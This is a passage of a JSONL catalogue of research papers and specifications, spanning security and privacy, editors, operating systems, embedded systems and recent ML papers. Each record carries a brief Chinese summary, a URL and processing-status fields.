Framework","meta":{"col3":"2018","col4":"Trevor Perrin;为 WireGuard/WhatsApp/Signal X3DH 提供通用 handshake pattern 形式化框架"},"url":"https://noiseprotocol.org/noise.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T05:14:29.570Z"} +{"slug":"signal-double-ratchet-2016","area":"papers","topic":"security-privacy","title":"The Double Ratchet Algorithm","meta":{"col3":"2016","col4":"Signal/WhatsApp/Matrix 端到端加密的核心;前向安全 + post-compromise security 同时实现"},"url":"https://signal.org/docs/specifications/doubleratchet/doubleratchet.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T05:18:45.156Z"} +{"slug":"ckks-homomorphic-2017","area":"papers","topic":"security-privacy","title":"Homomorphic Encryption for Arithmetic of Approximate Numbers","meta":{"col3":"2017","col4":"Cheon-Kim-Kim-Song;CKKS 全同态方案,浮点近似域;TenSeal/HEAAN/SEAL 后端基础"},"url":"https://eprint.iacr.org/2016/421.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} +{"slug":"dwork-differential-privacy-2006","area":"papers","topic":"security-privacy","title":"Calibrating Noise to Sensitivity in Private Data Analysis","meta":{"col3":"2006","col4":"Dwork-McSherry-Nissim-Smith;正式定义 ε-DP + Laplace mechanism;现代隐私 ML 范式起点"},"url":"https://link.springer.com/chapter/10.1007/11681878_14","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T05:23:49.984Z"} +{"slug":"zk-snark-pinocchio-2013","area":"papers","topic":"security-privacy","title":"Pinocchio: Nearly Practical Verifiable Computation","meta":{"col3":"2013","col4":"Parno et al.;首批工程化 zk-SNARK;Zcash/Filecoin/StarkWare 都站在它肩上"},"url":"https://eprint.iacr.org/2013/279","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T05:28:35.649Z"} +{"slug":"spectre-attack-2018","area":"papers","topic":"security-privacy","title":"Spectre Attacks: Exploiting Speculative Execution","meta":{"col3":"2018","col4":"Kocher et al.;揭示推测执行造成的边信道,触发整个 CPU 行业 redesign(IBPB/STIBP/retpoline)"},"url":"https://spectreattack.com/spectre.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} +{"slug":"meltdown-attack-2018","area":"papers","topic":"security-privacy","title":"Meltdown: Reading Kernel Memory from User Space","meta":{"col3":"2018","col4":"Lipp et al.;Intel 乱序执行漏洞,KPTI 进入 Linux/Windows/macOS 的直接动因"},"url":"https://meltdownattack.com/meltdown.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T05:32:04.298Z"} +{"slug":"rowhammer-2014","area":"papers","topic":"security-privacy","title":"Flipping Bits in Memory Without Accessing Them","meta":{"col3":"2014","col4":"Kim et al.;DRAM 物理副作用导致的位翻转,开启硬件层安全研究分支;ECC 不能完全防"},"url":"https://users.ece.cmu.edu/~yoonguk/papers/kim-isca14.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T05:39:03.105Z"} +{"slug":"oauth2-rfc6749","area":"papers","topic":"security-privacy","title":"OAuth 2.0 Authorization Framework (RFC 6749)","meta":{"col3":"2012","col4":"现代 web 授权事实标准;Google/GitHub/Slack/Atlassian/Apple Sign-In 都基于此"},"url":"https://datatracker.ietf.org/doc/html/rfc6749","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T05:41:06.077Z"} +{"slug":"webauthn-fido2","area":"papers","topic":"security-privacy","title":"Web Authentication: An API for accessing Public Key Credentials Level 2","meta":{"col3":"2021","col4":"W3C/FIDO2;passkey 的协议层;用挑战-响应 + 设备绑定密钥淘汰密码"},"url":"https://www.w3.org/TR/webauthn-2/","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} +{"slug":"log4shell-cve-2021-44228","area":"papers","topic":"security-privacy","title":"Log4Shell (CVE-2021-44228) Analysis","meta":{"col3":"2021","col4":"log4j JNDI 注入;JVM 生态最严重 RCE 之一;推动 SBOM/sigstore/SCA 普及"},"url":"https://logging.apache.org/log4j/2.x/security.html","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T05:47:04.929Z"} +{"slug":"sigstore-cosign-2022","area":"papers","topic":"security-privacy","title":"Sigstore: Software Signing for Everybody","meta":{"col3":"2022","col4":"Newman et al.;keyless signing + Rekor 透明日志;Linux Foundation 软件供应链方案"},"url":"https://www.usenix.org/conference/usenixsecurity22/presentation/newman","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T05:50:48.368Z"} +{"slug":"tls-1-3-rfc8446","area":"papers","topic":"security-privacy","title":"TLS 1.3 (RFC 8446)","meta":{"col3":"2018","col4":"0-RTT 握手 + 现代 AEAD 套件;mandates forward secrecy;现代 web 的握手层基线"},"url":"https://datatracker.ietf.org/doc/html/rfc8446","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T05:53:56.514Z"} +{"slug":"tree-sitter-2018","area":"papers","topic":"editors-ide","title":"Tree-sitter: An Incremental Parsing System","meta":{"col3":"2018","col4":"Max Brunsfeld;GLR 增量解析器生成器;Atom/Neovim/GitHub 高亮 + 代码导航的事实标准"},"url":"https://tree-sitter.github.io/tree-sitter/","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T05:53:54.414Z"} +{"slug":"language-server-protocol-spec","area":"papers","topic":"editors-ide","title":"Language Server Protocol Specification","meta":{"col3":"2016","col4":"Microsoft;M*N → M+N 的编辑器/语言解耦协议;rust-analyzer/clangd/pyright 等都基于此"},"url":"https://microsoft.github.io/language-server-protocol/specifications/lsp/3.17/specification/","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T05:54:59.306Z"} +{"slug":"debug-adapter-protocol","area":"papers","topic":"editors-ide","title":"Debug Adapter Protocol","meta":{"col3":"2017","col4":"Microsoft;DAP 把 debugger 与 IDE 解耦;VS Code/Vim/Emacs 都重用 DAP 客户端"},"url":"https://microsoft.github.io/debug-adapter-protocol/","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} +{"slug":"salsa-incremental-rust-analyzer","area":"papers","topic":"editors-ide","title":"Salsa: A Generic Framework for On-Demand, Incrementalized Computation","meta":{"col3":"2019","col4":"Niko Matsakis;rust-analyzer / rustc query system 引擎;增量编译/IDE 响应式核心"},"url":"https://github.com/salsa-rs/salsa","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T06:00:39.068Z"} +{"slug":"codemirror-6-architecture","area":"papers","topic":"editors-ide","title":"CodeMirror 6 Architecture","meta":{"col3":"2021","col4":"Marijn Haverbeke;不变式 state + functional view + tree-sitter 集成;现代 web editor 标杆"},"url":"https://codemirror.net/docs/guide/","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T06:06:01.745Z"} +{"slug":"monaco-editor-2016","area":"papers","topic":"editors-ide","title":"Monaco Editor: VS Code's Editor as a Library","meta":{"col3":"2016","col4":"Microsoft;VS Code 同源编辑器内核;TextMate grammars + LSP 客户端 + 基于行的渲染"},"url":"https://microsoft.github.io/monaco-editor/","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T06:11:04.596Z"} +{"slug":"zed-editor-collaborative","area":"papers","topic":"editors-ide","title":"Zed: A High-Performance Multiplayer Code Editor in Rust","meta":{"col3":"2024","col4":"Atom 团队;GPUI + CRDT + tree-sitter;端到端 Rust + 协同编辑实践范本"},"url":"https://zed.dev/blog/zed-decoded-architecture","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T06:16:07.549Z"} +{"slug":"eg-walker-collab-text-2024","area":"papers","topic":"editors-ide","title":"Collaborative Text Editing with Eg-walker: Better, Faster, Smaller","meta":{"col3":"2024","col4":"Kleppmann;OT 与 CRDT 之间的折中;显著降低协同编辑内存与加载时间"},"url":"https://arxiv.org/abs/2409.14252","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T06:21:10.798Z"} +{"slug":"yjs-crdt-overview","area":"papers","topic":"editors-ide","title":"Yjs: Shared Editing with CRDTs","meta":{"col3":"2020","col4":"Kevin Jahns;现代 web 协同编辑事实库;ProseMirror/CodeMirror/TipTap/BlockNote 后端"},"url":"https://docs.yjs.dev/","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T06:26:14.505Z"} +{"slug":"automerge-json-crdt-2017","area":"papers","topic":"editors-ide","title":"A Conflict-Free Replicated JSON Datatype","meta":{"col3":"2017","col4":"Kleppmann-Beresford;JSON CRDT 形式化;Automerge 1/2 演化的源"},"url":"https://arxiv.org/abs/1608.03960","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T06:28:27.842Z"} +{"slug":"operational-transform-jupiter-1995","area":"papers","topic":"editors-ide","title":"High-Latency, Low-Bandwidth Windowing in the Jupiter Collaboration System","meta":{"col3":"1995","col4":"Nichols et al.;Google Docs / Etherpad 使用的 OT 算法源头"},"url":"https://dl.acm.org/doi/10.1145/215585.215706","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T06:36:37.716Z"} +{"slug":"prosemirror-architecture","area":"papers","topic":"editors-ide","title":"ProseMirror: A Toolkit for Building Rich-Text Editors","meta":{"col3":"2017","col4":"Marijn Haverbeke;schema-driven 富文本,Notion/Atlassian/Confluence 编辑器后端"},"url":"https://prosemirror.net/docs/guide/","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T06:41:41.253Z"} +{"slug":"rust-analyzer-architecture","area":"papers","topic":"editors-ide","title":"Rust Analyzer: Architecture","meta":{"col3":"2019","col4":"Aleksey Kladov;增量分析 + lazy evaluation + on-demand compiler;现代 IDE 引擎设计教科书"},"url":"https://github.com/rust-lang/rust-analyzer/blob/master/docs/dev/architecture.md","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T06:46:20.104Z"} +{"slug":"kakoune-vim-philosophy","area":"papers","topic":"editors-ide","title":"Kakoune: An Object-Oriented Modal Editor","meta":{"col3":"2020","col4":"把 Vim 的 verb-noun 颠倒成 noun-verb;多光标 first-class;Helix 直接继承其设计"},"url":"https://kakoune.org/why-kakoune/why-kakoune.html","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T06:51:23.277Z"} +{"slug":"mach-rashid-1986","area":"papers","topic":"operating-systems","title":"Mach: A New Kernel Foundation for UNIX Development","meta":{"col3":"1986","col4":"Rashid et al.;微内核与 IPC 范式;macOS/iOS XNU 的 Mach 部分直接继承"},"url":"https://www.cs.cmu.edu/afs/cs/project/mach/public/www/doc/publications/usenix86.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} +{"slug":"l4-microkernel-1995","area":"papers","topic":"operating-systems","title":"On Micro-Kernel Construction (L4)","meta":{"col3":"1995","col4":"Liedtke;秒级 IPC 性能 + 极简内核;seL4/Genode/Fiasco 谱系起点"},"url":"https://os.itec.kit.edu/downloads/sosp95-mkernel-construction.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T06:06:01.868Z"} +{"slug":"sel4-formal-2009","area":"papers","topic":"operating-systems","title":"seL4: Formal Verification of an OS Kernel","meta":{"col3":"2009","col4":"Klein et al. SOSP'09;首个端到端形式化验证内核;安全/航空/防御领域基线"},"url":"https://sel4.systems/Info/Docs/seL4-paper-CACM.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T06:11:04.723Z"} +{"slug":"singularity-os-2007","area":"papers","topic":"operating-systems","title":"Singularity: Rethinking the Software Stack","meta":{"col3":"2007","col4":"Hunt-Larus;软件隔离进程 + 类型化 IPC;Rust-style safety 在 OS 层的早期探索"},"url":"https://www.microsoft.com/en-us/research/wp-content/uploads/2007/04/osr2007_rethinkingsoftwarestack.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T06:16:07.687Z"} +{"slug":"mirage-unikernel-2013","area":"papers","topic":"operating-systems","title":"Unikernels: Library Operating Systems for the Cloud","meta":{"col3":"2013","col4":"Madhavapeddy et al. ASPLOS'13;OCaml 编出 unikernel;冷启动 < 50ms 的 cloud OS 范本"},"url":"https://anil.recoil.org/papers/2013-asplos-mirage.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T06:21:10.932Z"} +{"slug":"firecracker-microvm-2020","area":"papers","topic":"operating-systems","title":"Firecracker: Lightweight Virtualization for Serverless Applications","meta":{"col3":"2020","col4":"Agache et al. NSDI'20;AWS Lambda/Fargate 的 microVM;KVM + jailer,125ms 启动 + 5MiB 内存"},"url":"https://www.usenix.org/system/files/nsdi20-paper-agache.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T06:26:14.686Z"} +{"slug":"io-uring-axboe-2019","area":"papers","topic":"operating-systems","title":"Efficient IO with io_uring","meta":{"col3":"2019","col4":"Jens Axboe;Linux 5.1+;共享环 + SQE/CQE,绕开 syscall 进出,DB/网络栈下一代 IO"},"url":"https://kernel.dk/io_uring.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T06:36:37.842Z"} +{"slug":"ebpf-linux-runtime-2024","area":"papers","topic":"operating-systems","title":"The eBPF Runtime in the Linux Kernel","meta":{"col3":"2024","col4":"Gbadamosi et al.;首篇系统化 eBPF 运行时论文;observability/network/security/scheduler 全面覆盖"},"url":"https://arxiv.org/abs/2410.00026","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T06:41:41.381Z"} +{"slug":"zfs-bonwick-2003","area":"papers","topic":"operating-systems","title":"The Zettabyte File System (ZFS)","meta":{"col3":"2003","col4":"Bonwick;CoW + transactional + 校验和 + snapshot;现代 filesystem 范式(Btrfs/APFS 都受影响)"},"url":"https://www.cs.hmc.edu/~rhodes/courses/cs134/papers/zfs.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T06:46:20.233Z"} +{"slug":"rcu-mckenney-2017","area":"papers","topic":"operating-systems","title":"What is RCU, Fundamentally?","meta":{"col3":"2017","col4":"Paul McKenney;Linux 内核读端无锁同步范式;调度器/路由表/虚存子系统都用"},"url":"https://lwn.net/Articles/262464/","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T06:51:23.405Z"} +{"slug":"jemalloc-evans-2006","area":"papers","topic":"operating-systems","title":"A Scalable Concurrent malloc(3) Implementation for FreeBSD","meta":{"col3":"2006","col4":"Jason Evans;jemalloc;多 arena + 线程缓存 + size class;FreeBSD/Firefox/Redis 默认"},"url":"https://people.freebsd.org/~jasone/jemalloc/bsdcan2006/jemalloc.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T06:56:24.642Z"} +{"slug":"tcmalloc-google-2007","area":"papers","topic":"operating-systems","title":"TCMalloc: Thread-Caching Malloc","meta":{"col3":"2007","col4":"Google;per-thread cache + central freelist + page heap;Chromium/Bazel/绝大多数 Google 服务默认"},"url":"https://google.github.io/tcmalloc/design.html","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T07:01:27.979Z"} +{"slug":"mimalloc-leijen-2019","area":"papers","topic":"operating-systems","title":"Mimalloc: Free List Sharding in Action","meta":{"col3":"2019","col4":"Leijen et al. MSR;segment + page + free list 分片;性能逼近 jemalloc 的同时简洁很多"},"url":"https://www.microsoft.com/en-us/research/uploads/prod/2019/06/mimalloc-tr-v1.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T07:06:31.225Z"} +{"slug":"dpdk-poll-mode-driver","area":"papers","topic":"operating-systems","title":"Data Plane Development Kit (DPDK) Architecture","meta":{"col3":"2014","col4":"Intel;用户态 poll-mode driver + hugepage + lockless ring;线速 100Gbps 网络栈基础"},"url":"https://www.dpdk.org/wp-content/uploads/sites/35/2014/09/DPDK-SFSummit2014-HighPerformanceNetworkingLeveragingDPDK-Brief.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T07:11:34.417Z"} +{"slug":"freertos-overview","area":"papers","topic":"embedded-iot","title":"FreeRTOS Reference Manual","meta":{"col3":"2003","col4":"Real Time Engineers;嵌入式 RTOS 事实标准;亚马逊 2017 收购后纳入 AWS IoT"},"url":"https://www.freertos.org/Documentation/RTOS_book.html","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T06:36:37.972Z"} +{"slug":"zephyr-rtos-overview","area":"papers","topic":"embedded-iot","title":"Zephyr Project: A Linux Foundation RTOS","meta":{"col3":"2017","col4":"scalable POSIX-like RTOS;蓝牙/Thread/USB 全栈支持;Nordic/Intel/NXP 主推"},"url":"https://docs.zephyrproject.org/latest/introduction/index.html","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T06:41:41.511Z"} +{"slug":"rate-monotonic-1973","area":"papers","topic":"embedded-iot","title":"Scheduling Algorithms for Multiprogramming in a Hard-Real-Time Environment","meta":{"col3":"1973","col4":"Liu-Layland;rate-monotonic 调度 + 利用率界定理;实时调度奠基论文"},"url":"https://dl.acm.org/doi/10.1145/321738.321743","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T06:46:20.357Z"} +{"slug":"priority-inversion-mars-pathfinder","area":"papers","topic":"embedded-iot","title":"What Really Happened on Mars Pathfinder","meta":{"col3":"1997","col4":"Mike Jones;火星探路者 reset 案例;priority inheritance 经典 case study"},"url":"https://www.cs.unc.edu/~anderson/teach/comp790/papers/mars_pathfinder_long_version.html","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T06:51:23.532Z"} +{"slug":"matter-protocol-1-0","area":"papers","topic":"embedded-iot","title":"Matter 1.0 Specification","meta":{"col3":"2022","col4":"CSA;统一 Apple/Google/Amazon/Samsung 智能家居协议;基于 Thread/WiFi + IPv6"},"url":"https://csa-iot.org/all-solutions/matter/","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T06:56:24.775Z"} +{"slug":"mqtt-v5-spec","area":"papers","topic":"embedded-iot","title":"MQTT Version 5.0 OASIS Standard","meta":{"col3":"2019","col4":"publish/subscribe 轻量协议;AWS IoT/Azure IoT/HiveMQ 实现;session 共享/properties 增强"},"url":"https://docs.oasis-open.org/mqtt/mqtt/v5.0/mqtt-v5.0.html","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T07:01:28.107Z"} +{"slug":"coap-rfc7252","area":"papers","topic":"embedded-iot","title":"Constrained Application Protocol (RFC 7252)","meta":{"col3":"2014","col4":"IETF;UDP 上的 RESTful 协议;Thread/6LoWPAN 设备首选;resource discovery + observe"},"url":"https://datatracker.ietf.org/doc/html/rfc7252","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T07:06:31.351Z"} +{"slug":"zigbee-vs-matter-thread-2026","area":"papers","topic":"embedded-iot","title":"Zigbee vs. Matter over Thread: Understanding IoT Protocol Performance","meta":{"col3":"2026","col4":"实测 mesh 路由恢复 / 多跳延迟 / 吞吐 trade-off;选型决策依据"},"url":"https://arxiv.org/abs/2603.04221","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T07:11:34.543Z"} +{"slug":"tflite-micro-2021","area":"papers","topic":"embedded-iot","title":"TensorFlow Lite Micro: Embedded ML for TinyML Systems","meta":{"col3":"2021","col4":"Google;针对 < 1MB SRAM MCU 的 ML runtime;Cortex-M0+ 上跑 keyword spotting/wake word"},"url":"https://arxiv.org/abs/2010.08678","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T07:16:37.609Z"} +{"slug":"microtvm-2020","area":"papers","topic":"embedded-iot","title":"microTVM: Tensor Virtual Machine for Microcontrollers","meta":{"col3":"2020","col4":"TVM 团队;编译 ML 到 bare-metal MCU;自动调优 CMSIS-NN kernel"},"url":"https://tvm.apache.org/docs/topic/microtvm/index.html","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T07:21:40.801Z"} +{"slug":"embassy-async-rust-embedded","area":"papers","topic":"embedded-iot","title":"Embassy: Modern Async Rust for Embedded Systems","meta":{"col3":"2023","col4":"Dirbaio;async/await + DMA-aware HAL;嵌入式 Rust 事实并发框架(STM32/nRF/RP2040)"},"url":"https://embassy.dev/book/","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T07:26:44.364Z"} +{"slug":"u-boot-bootloader","area":"papers","topic":"embedded-iot","title":"Das U-Boot Universal Bootloader","meta":{"col3":"2002","col4":"DENX;ARM/PPC/RISC-V 嵌入式启动事实标准;DTB / FIT image / verified boot 基础"},"url":"https://docs.u-boot.org/en/latest/","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T07:31:47.617Z"} +{"slug":"trustzone-arm-2009","area":"papers","topic":"embedded-iot","title":"ARM TrustZone Technology Overview","meta":{"col3":"2009","col4":"ARM;CPU 双世界硬件隔离;OP-TEE/Android Keystore/Samsung Knox 基础"},"url":"https://developer.arm.com/documentation/PRD29-GENC-009492/c/","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T07:36:50.855Z"} +{"slug":"op-tee-tee-2014","area":"papers","topic":"embedded-iot","title":"OP-TEE: Open Portable Trusted Execution Environment","meta":{"col3":"2014","col4":"Linaro;GlobalPlatform TEE 实现;Android/Automotive 安全启动 + 密钥保护事实标准"},"url":"https://optee.readthedocs.io/en/latest/","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T07:46:57.325Z"} +{"slug":"esp-idf-overview","area":"papers","topic":"embedded-iot","title":"ESP-IDF: Espressif IoT Development Framework","meta":{"col3":"2017","col4":"ESP32 系列开发栈;FreeRTOS-SMP 移植 + WiFi/BT 协议栈 + secure boot v2"},"url":"https://docs.espressif.com/projects/esp-idf/en/latest/esp32/","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance","written_at":"2026-06-13T07:52:00.493Z"} +{"slug":"videomla","area":"papers","topic":"machine-learning","title":"VideoMLA: Low-Rank Latent KV Cache for Minute-Scale Autoregressive Video Diffusion","meta":{"col3":"2026","col4":"arXiv 2605.30351;MLA 在视频 diffusion;92.7% per-token KV memory 减少;1.23x 吞吐 (B200)。"},"url":"https://arxiv.org/abs/2605.30351","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T06:36:38.098Z"} +{"slug":"schgen-pcb","area":"papers","topic":"machine-learning","title":"SchGen: PCB Schematic Generation with Semantic-Grounded Code Representations","meta":{"col3":"2026","col4":"arXiv 2605.30345;首个 NL→PCB schematic LLM;relative placement + pin-name wiring。"},"url":"https://arxiv.org/abs/2605.30345","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T06:41:41.637Z"} +{"slug":"diffusion-posterior-finite","area":"papers","topic":"machine-learning","title":"When, Why, and How Do Diffusion Posterior Samplers Fail? A Finite-Sample Lens","meta":{"col3":"2026","col4":"arXiv 2605.30330;finite-sample diagnostic;hallucination/early-stop 病因图谱。"},"url":"https://arxiv.org/abs/2605.30330","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T06:46:20.481Z"} +{"slug":"medcase-fhir","area":"papers","topic":"machine-learning","title":"MedCase-Structured: Text-to-FHIR Dataset for EHR Diagnostic Reasoning","meta":{"col3":"2026","col4":"arXiv 2605.30295;82.5% valid FHIR;structured input 反而 LLM 准确率下降。"},"url":"https://arxiv.org/abs/2605.30295","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T06:51:23.657Z"} +{"slug":"reasoning-with-sampling","area":"papers","topic":"machine-learning","title":"Reasoning with Sampling: Cutting at Decision Points","meta":{"col3":"2026","col4":"arXiv 2605.30327;entropy-cut Metropolis-Hastings;mixing 与 decision count 而非 token count 成比;不需 RL。"},"url":"https://arxiv.org/abs/2605.30327","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T06:56:24.907Z"} +{"slug":"self-trained-verification","area":"papers","topic":"machine-learning","title":"Self-Trained Verification for Training- and Test-Time Self-Improvement","meta":{"col3":"2026","col4":"arXiv 2605.30290;STV: 训 verifier 模仿 informed self;hard math 翻倍准确率;ViL 训练循环。"},"url":"https://arxiv.org/abs/2605.30290","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T07:01:28.232Z"} +{"slug":"ppc-preplan","area":"papers","topic":"machine-learning","title":"Knowing What to Solve Before How: Preplan-Plan-CoT for Math Reasoning","meta":{"col3":"2026","col4":"arXiv 2605.30245;question→preplan→plan→cot;spoiler-score detector + GRPO;39/40 best metrics。"},"url":"https://arxiv.org/abs/2605.30245","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T07:06:31.476Z"} +{"slug":"lomo-modality","area":"papers","topic":"machine-learning","title":"LoMo: Local Modality Substitution for Deeper Vision-Language Fusion","meta":{"col3":"2026","col4":"arXiv 2605.30265;解决 carrier sensitivity;text→image 渲染交错;13 multimodal benchmarks。"},"url":"https://arxiv.org/abs/2605.30265","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T07:11:34.672Z"} +{"slug":"entity-tracking-states","area":"papers","topic":"machine-learning","title":"Do Language Models Track Entities Across State Changes?","meta":{"col3":"2026","col4":"arXiv 2605.30233;LM 不增量跟踪状态而是 last-token 聚合;REMOVE 用 fragile suppression tag;mechanistic+behavioral 互校。"},"url":"https://arxiv.org/abs/2605.30233","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T07:16:37.738Z"} +{"slug":"passnet-graph-compiler","area":"papers","topic":"compilers-pl","title":"PassNet: Scaling LLMs for Graph Compiler Pass Generation","meta":{"col3":"2026","col4":"arXiv 2605.29357;18K subgraph 数据集;ES_t 评估;frontier 比 TorchInductor 落 37%;fine-tune 提 2.67x。"},"url":"https://arxiv.org/abs/2605.29357","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T06:56:25.039Z"} +{"slug":"e-path-egraph","area":"papers","topic":"compilers-pl","title":"E-Path: Equality Saturation for Control-Flow Graphs","meta":{"col3":"2026","col4":"arXiv 2605.28694;instruction 